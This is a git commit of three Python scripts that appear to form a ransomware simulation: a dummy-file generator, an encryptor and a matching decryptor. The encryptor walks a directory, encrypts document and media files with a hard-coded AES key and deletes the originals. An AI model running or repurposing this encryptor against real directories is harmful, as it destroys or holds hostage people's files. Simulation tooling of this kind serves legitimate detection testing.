initial commit

This commit is contained in:
Kosta Mushkin
2025-04-12 14:33:32 -04:00
parent 955ec79014
commit ba16ef9a08
83 changed files with 10290 additions and 2 deletions
+78
View File
@@ -0,0 +1,78 @@
#!/usr/bin/env python3
import os
import argparse
import logging
import shutil
def create_dataset(base_dir: str, number_of_files: int,
                   file_size_bytes: int = 1024 * 1024):
    """Create numbered test files, each filled with its own repeated name.

    File ``i`` is written to ``<base_dir>/file{i:04d}.txt`` and contains the
    line ``file{i:04d}`` repeated until the file holds at least
    ``file_size_bytes`` bytes (rounded up to a whole number of lines).

    Args:
        base_dir: Directory to write into; created if it does not exist.
        number_of_files: How many files to create; must be positive.
        file_size_bytes: Target size of each file in bytes (default 1 MiB);
            must be positive.

    Raises:
        ValueError: If ``number_of_files`` or ``file_size_bytes`` is not
            positive, or if the free space reported for ``base_dir`` is
            smaller than the estimated dataset size.
        OSError: If the directory or one of the files cannot be written.
    """
    try:
        # Validate input
        if number_of_files <= 0:
            raise ValueError("Number of files must be positive")
        if file_size_bytes <= 0:
            raise ValueError("File size must be positive")

        # Create directory if it doesn't exist
        os.makedirs(base_dir, exist_ok=True)

        # Estimate required disk space; each file overshoots the target by
        # less than one line, so this is a close lower bound.
        required_space = number_of_files * file_size_bytes
        free_space = shutil.disk_usage(base_dir).free
        if free_space < required_space:
            raise ValueError(
                f"Not enough disk space. Need {required_space / (1024**3):.2f} GB, "
                f"but only {free_space / (1024**3):.2f} GB available"
            )

        # Only the files written by this call are counted, so unrelated
        # entries already present in base_dir do not skew the summary.
        total_size = 0

        for i in range(number_of_files):
            line = f"file{i:04d}\n"
            # Derive the line count from the real line length (ceiling
            # division) instead of assuming a fixed number of bytes per line.
            lines_per_file = -(-file_size_bytes // len(line))

            # Write in bounded chunks: few write calls, bounded memory.
            lines_per_chunk = min(lines_per_file, 8192)
            chunk = line * lines_per_chunk
            full_chunks, leftover_lines = divmod(lines_per_file, lines_per_chunk)

            file_path = os.path.join(base_dir, f"file{i:04d}.txt")
            # newline="\n" disables platform newline translation so the
            # on-disk size matches the number of characters written.
            with open(file_path, 'w', encoding='ascii', newline='\n') as f:
                for _ in range(full_chunks):
                    f.write(chunk)
                f.write(line * leftover_lines)
            total_size += os.path.getsize(file_path)

            # Log every 100 files
            if (i + 1) % 100 == 0:
                logging.info(f"Created {i + 1} files...")

        logging.info(f"Created dataset in {base_dir}")
        logging.info(f"Total files created: {number_of_files}")
        logging.info(f"Total dataset size: {total_size / (1024*1024):.2f} MB")
        logging.info(f"Average file size: {total_size / (number_of_files * 1024*1024):.2f} MB")
    except Exception as e:
        # Log for the operator, then let the caller see the original error.
        logging.error(f"Failed to create dataset: {str(e)}")
        raise
def main():
    """Command-line entry point for the dataset generator.

    Reads ``--base_dir`` (default ``~/encryption_test``) and the required
    integer ``--number_of_files``, sets up INFO-level logging, expands a
    leading ``~`` in the directory, and calls ``create_dataset``.
    """
    cli = argparse.ArgumentParser(description="Create test dataset")
    cli.add_argument(
        "--base_dir",
        default="~/encryption_test",
        help="Base directory for test files (default: ~/encryption_test)",
    )
    cli.add_argument(
        "--number_of_files",
        type=int,
        required=True,
        help="Number of files to create",
    )
    options = cli.parse_args()

    # Timestamped, level-tagged messages on the root logger.
    logging.basicConfig(
        format='%(asctime)s - %(levelname)s - %(message)s',
        level=logging.INFO,
    )

    # "~/..." is not expanded by argparse, so resolve it here.
    target_dir = os.path.expanduser(options.base_dir)
    create_dataset(target_dir, options.number_of_files)


if __name__ == "__main__":
    main()
+129
View File
@@ -0,0 +1,129 @@
#!/usr/bin/env python3
import os
import argparse
import logging
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64
import sys
def generate_key(password: str) -> bytes:
    """Return the fixed AES key used by these test scripts.

    The ``password`` argument is accepted but not used: the same hard-coded
    base64 string is decoded and returned on every call.
    """
    # Fixed key for testing (the original note says it mirrors a PowerShell script).
    fixed_key_b64 = "Q5KyUru6wn82hlY9k8xUjJOPIC9da41jgRkpt21jo2L="
    raw_key = base64.b64decode(fixed_key_b64)
    return raw_key
def decrypt_file(file_path: str, key: bytes) -> bool:
    """Decrypt a single ``.encrypted`` file with AES in CBC mode.

    The input is read as a 16-byte IV followed by the ciphertext. After
    decryption and PKCS7 unpadding the plaintext is written to the same path
    with the trailing ``.encrypted`` removed, and the encrypted file is
    deleted.

    Args:
        file_path: Path of the encrypted file; must end with ``.encrypted``.
        key: AES key bytes passed to ``algorithms.AES``.

    Returns:
        True on success. False if the path lacks the ``.encrypted`` suffix or
        if any step raises; the failure is logged rather than propagated.
    """
    suffix = '.encrypted'

    # Without the suffix the output path would equal the input path: the
    # plaintext would overwrite the ciphertext and then be removed below.
    # Refuse such paths instead of destroying the file.
    if not file_path.endswith(suffix):
        logging.error(f"Failed to decrypt {file_path}: missing '{suffix}' suffix")
        return False

    # Strip exactly the trailing suffix (not the last occurrence anywhere).
    decrypted_path = file_path[:-len(suffix)]

    try:
        # Read the encrypted file
        with open(file_path, 'rb') as file:
            # Read IV (first 16 bytes) and encrypted data
            iv = file.read(16)
            encrypted_data = file.read()

        # Create AES cipher
        cipher = Cipher(
            algorithms.AES(key),
            modes.CBC(iv),
            backend=default_backend()
        )
        decryptor = cipher.decryptor()

        # Decrypt the data
        padded_data = decryptor.update(encrypted_data) + decryptor.finalize()

        # Remove padding
        unpadder = padding.PKCS7(128).unpadder()
        decrypted_data = unpadder.update(padded_data) + unpadder.finalize()

        # Write the decrypted data next to the encrypted file
        with open(decrypted_path, 'wb') as file:
            file.write(decrypted_data)

        # Remove the encrypted file only after the plaintext was written
        os.remove(file_path)
        return True
    except Exception as e:
        logging.error(f"Failed to decrypt {file_path}: {str(e)}")
        return False
def decrypt_directory(base_dir: str, password: str):
    """Decrypt every ``.encrypted`` file found under ``base_dir``.

    The tree is walked recursively, each matching file is passed to
    ``decrypt_file`` with the key from ``generate_key(password)``, and
    progress plus a final success/failure tally are logged. Unexpected
    errors are logged and re-raised.
    """
    try:
        key = generate_key(password)

        # Collect the full list first so the total is known for progress logs.
        encrypted_paths = [
            os.path.join(folder, name)
            for folder, _, names in os.walk(base_dir)
            for name in names
            if name.endswith('.encrypted')
        ]
        total = len(encrypted_paths)

        if not encrypted_paths:
            logging.info("No encrypted files found")
            return

        logging.info(f"Found {total} encrypted files")

        failures = 0
        for position, path in enumerate(encrypted_paths, start=1):
            logging.info(f"Decrypting {path}")
            if not decrypt_file(path, key):
                failures += 1

            # Report every 100th file and always after the last one.
            if position == total or position % 100 == 0:
                logging.info(f"Processed {position}/{total} files...")

        successes = total - failures
        logging.info("Decryption complete!")
        logging.info(f"Successfully decrypted: {successes} files")
        if failures > 0:
            logging.warning(f"Failed to decrypt: {failures} files")
    except Exception as e:
        logging.error(f"Decryption failed: {str(e)}")
        raise
def main():
    """Command-line entry point for the decryption script.

    Reads ``--base_dir`` (default ``~/encryption_test``) and the required
    ``--password``, sets up INFO-level logging, expands a leading ``~`` in
    the directory, exits with status 1 if that directory does not exist, and
    otherwise calls ``decrypt_directory``.
    """
    cli = argparse.ArgumentParser(description="Decrypt files in directory")
    cli.add_argument(
        "--base_dir",
        default="~/encryption_test",
        help="Base directory containing files to decrypt (default: ~/encryption_test)",
    )
    cli.add_argument(
        "--password",
        required=True,
        help="Password for decryption (must match encryption password)",
    )
    options = cli.parse_args()

    # Timestamped, level-tagged messages on the root logger.
    logging.basicConfig(
        format='%(asctime)s - %(levelname)s - %(message)s',
        level=logging.INFO,
    )

    # "~/..." is not expanded by argparse, so resolve it here.
    target_dir = os.path.expanduser(options.base_dir)

    # Bail out early when there is nothing to walk.
    if not os.path.isdir(target_dir):
        logging.error(f"Directory not found: {target_dir}")
        sys.exit(1)

    decrypt_directory(target_dir, options.password)


if __name__ == "__main__":
    main()
+140
View File
@@ -0,0 +1,140 @@
#!/usr/bin/env python3
import os
import argparse
import logging
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64
import sys
def generate_key(password: str) -> bytes:
    """Return the fixed AES key shared by the encrypt and decrypt test scripts.

    ``password`` is part of the signature but is never read; every call
    decodes and returns the same hard-coded base64 key.
    """
    # Fixed key for testing (the original note says it mirrors a PowerShell script).
    encoded_key = "Q5KyUru6wn82hlY9k8xUjJOPIC9da41jgRkpt21jo2L="
    decoded_key = base64.b64decode(encoded_key)
    return decoded_key
def encrypt_file(file_path: str, key: bytes) -> bool:
    """Encrypt a single file with AES in CBC mode.

    The whole file is read, PKCS7-padded and encrypted under a fresh random
    16-byte IV. The output ``<file_path>.encrypted`` holds the IV followed by
    the ciphertext, after which the original file is deleted.

    Returns:
        True on success; False if any step raises (the error is logged).
    """
    try:
        with open(file_path, 'rb') as source:
            plaintext = source.read()

        # A new random IV per file; it is stored in front of the ciphertext.
        iv = os.urandom(16)
        encryptor = Cipher(
            algorithms.AES(key),
            modes.CBC(iv),
            backend=default_backend()
        ).encryptor()

        # Pad to the 128-bit AES block size before encrypting.
        padder = padding.PKCS7(128).padder()
        padded = padder.update(plaintext) + padder.finalize()
        ciphertext = encryptor.update(padded) + encryptor.finalize()

        destination = f"{file_path}.encrypted"
        with open(destination, 'wb') as target:
            target.write(iv)
            target.write(ciphertext)

        # The original is removed only after the encrypted copy was written.
        os.remove(file_path)
    except Exception as e:
        logging.error(f"Failed to encrypt {file_path}: {str(e)}")
        return False
    else:
        return True
def encrypt_directory(base_dir: str, password: str):
    """Encrypt every file with a targeted extension under ``base_dir``.

    The tree is walked recursively; files whose lower-cased name ends with
    one of the target extensions (and that do not already end with
    ``.encrypted``) are passed to ``encrypt_file`` with the key from
    ``generate_key(password)``. Progress and a final success/failure tally
    are logged. Unexpected errors are logged and re-raised.
    """
    try:
        key = generate_key(password)

        # Target file extensions (noted in the original as matching the
        # PowerShell script).
        target_extensions = (
            '.pdf', '.xls', '.xlsx', '.ppt', '.pptx', '.doc', '.docx',
            '.rtf', '.txt', '.csv', '.jpg', '.jpeg', '.png', '.gif',
            '.avi', '.midi', '.mov', '.mp3', '.mp4', '.mpeg', '.mpg', '.ogg',
        )

        # Collect the full list first so the total is known for progress logs.
        candidates = [
            os.path.join(folder, name)
            for folder, _, names in os.walk(base_dir)
            for name in names
            if name.lower().endswith(target_extensions)
            and not name.endswith('.encrypted')
        ]
        total = len(candidates)

        if not candidates:
            logging.info("No files found to encrypt")
            return

        logging.info(f"Found {total} files to encrypt")

        failures = 0
        for position, path in enumerate(candidates, start=1):
            logging.info(f"Encrypting {path}")
            if not encrypt_file(path, key):
                failures += 1

            # Report every 100th file and always after the last one.
            if position == total or position % 100 == 0:
                logging.info(f"Processed {position}/{total} files...")

        successes = total - failures
        logging.info("Encryption complete!")
        logging.info(f"Successfully encrypted: {successes} files")
        if failures > 0:
            logging.warning(f"Failed to encrypt: {failures} files")
    except Exception as e:
        logging.error(f"Encryption failed: {str(e)}")
        raise
def main():
    """Command-line entry point for the encryption script.

    Reads ``--base_dir`` (default ``~/encryption_test``) and the required
    ``--password``, sets up INFO-level logging, expands a leading ``~`` in
    the directory, exits with status 1 if that directory does not exist, and
    otherwise calls ``encrypt_directory``.
    """
    cli = argparse.ArgumentParser(description="Encrypt files in directory")
    cli.add_argument(
        "--base_dir",
        default="~/encryption_test",
        help="Base directory containing files to encrypt (default: ~/encryption_test)",
    )
    cli.add_argument(
        "--password",
        required=True,
        help="Password for encryption",
    )
    options = cli.parse_args()

    # Timestamped, level-tagged messages on the root logger.
    logging.basicConfig(
        format='%(asctime)s - %(levelname)s - %(message)s',
        level=logging.INFO,
    )

    # "~/..." is not expanded by argparse, so resolve it here.
    target_dir = os.path.expanduser(options.base_dir)

    # Bail out early when there is nothing to walk.
    if not os.path.isdir(target_dir):
        logging.error(f"Directory not found: {target_dir}")
        sys.exit(1)

    encrypt_directory(target_dir, options.password)


if __name__ == "__main__":
    main()